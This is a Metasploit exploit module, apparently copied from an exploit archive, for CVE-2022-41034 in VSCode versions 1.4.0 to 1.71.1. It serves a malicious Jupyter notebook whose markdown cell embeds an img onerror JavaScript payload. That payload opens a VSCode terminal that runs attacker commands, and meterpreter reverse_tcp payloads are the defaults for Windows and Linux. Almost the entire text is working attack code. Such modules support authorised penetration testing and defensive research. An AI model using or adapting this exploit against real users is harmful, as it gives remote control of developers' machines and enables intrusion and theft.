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## https://sploitus.com/exploit?id=PACKETSTORM:179029
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'VSCode ipynb Remote Development RCE',  
'Description' => %q{  
VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.  
On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed  
HTML and javascript, which can then open new terminal windows within VSCode.  
Each of these new windows can then execute arbitrary code at startup.  
  
During testing, the first open of the Jupyter notebook resulted in pop-ups  
displaying errors of unable to find the payload exe file. The second attempt  
at opening the Jupyter notebook would result in successful exeuction.  
  
Successfully tested against VSCode 1.70.2 on Windows 10.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die', # metasploit module  
'Zemnmez'  
],  
'References' => [  
['URL', 'https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m'],  
['CVE', '2022-41034'],  
['URL', 'https://github.com/andyhsu024/CVE-2022-41034']  
],  
'DisclosureDate' => '2022-11-22',  
'Privileged' => false,  
'Arch' => ARCH_CMD,  
'Stance' => Stance::Aggressive,  
'Payload' => { 'BadChars' => '&"' },  
'Targets' => [  
[  
'Windows',  
{  
'Platform' => 'win',  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'  
}  
  
}  
],  
[  
'Linux File-Dropper',  
{  
'Platform' => 'linux',  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'WfsDelay' => 3_600, # 1hr  
'URIPATH' => 'project.ipynb'  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
# on windows it will say the final payload can't be found  
# however, it is, seems to be a timing issue, 2nd exploit attempt  
# works perfectly  
'Reliability' => [REPEATABLE_SESSION, FIRST_ATTEMPT_FAIL],  
'SideEffects' => [SCREEN_EFFECTS]  
}  
)  
)  
register_options(  
[  
OptString.new('PAYLOAD_FILENAME', [ false, 'Name of the payload file - only required when exploiting on Linux.', 'shell.sh' ]),  
OptString.new('WRITABLE_DIR', [ false, 'Name of the writable directory containing the payload file - required when exploiting on Linux .', '/tmp/' ]),  
]  
)  
end  
  
def check  
CheckCode::Unsupported  
end  
  
def exploit  
unless datastore['URIPATH'].end_with? '.ipynb'  
fail_with(Failure::BadConfig, 'URIPATH must end in .ipynb for exploit to be successful')  
end  
print_status('Starting up web service...')  
start_service  
sleep(datastore['WFSDELAY'])  
end  
  
def on_request_uri(cli, request)  
super unless request.uri.end_with? datastore['URIPATH']  
  
if target['Platform'] == 'win'  
config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }  
else  
config = { 'executable' => "/#{datastore['WRITABLE_DIR']}/#{datastore['PAYLOAD_FILENAME']}" }  
end  
  
pload = JSON.dump({ 'config' => config })  
pload = CGI.escape(pload).gsub('+', '%20') # XXX not sure if this is needed or not, but it works  
  
ipynb = %|{  
"cells": [  
{  
"cell_type": "markdown",  
"metadata": {},  
"source": [  
"<img src=a onerror=\\"let q = document.createElement('a');q.href='command:workbench.action.terminal.new?#{pload}';document.body.appendChild(q);q.click()\\"/>"  
]  
}  
]}|  
  
send_response(cli, ipynb, {  
'Connection' => 'close',  
'Pragma' => 'no-cache',  
'Access-Control-Allow-Origin' => '*'  
})  
  
print_status("Sent #{datastore['URIPATH']} to #{cli.peerhost}")  
end  
  
end